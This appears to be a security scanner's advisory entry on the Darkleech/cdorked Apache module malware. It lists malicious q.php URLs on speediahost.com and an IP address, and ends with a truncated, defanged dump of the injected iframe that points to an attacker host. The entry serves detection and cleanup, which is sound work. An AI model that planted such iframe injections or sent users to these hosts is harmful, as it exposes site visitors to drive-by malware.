Description: A higly conditional server-side malware (Darkleech or cdorked) was identified in the server. This is an ongoing campaign and it means the server was compromised with malicous Apache modules or binaries. More details here:
1- New Apache Module Injection
2- Apache Binary Backdoors on Cpanel-based servers
3- Server Compromises – Understanding Apache Module iFrame Injections and Secure Shell Backdoor
Domains involved:
http://1swifthost.speediahost.com/319c19c7059638898b1d363da61ceec0/q.php
http://67.213.213.17/63aa46fa31dda8b5/q.php
.. others (randomly generated)Affecting: Any type of linux-based server.
Latest update: 2013/Jun
Malware dump:
<iframe src="httx://1swifthost.speediahost.com/...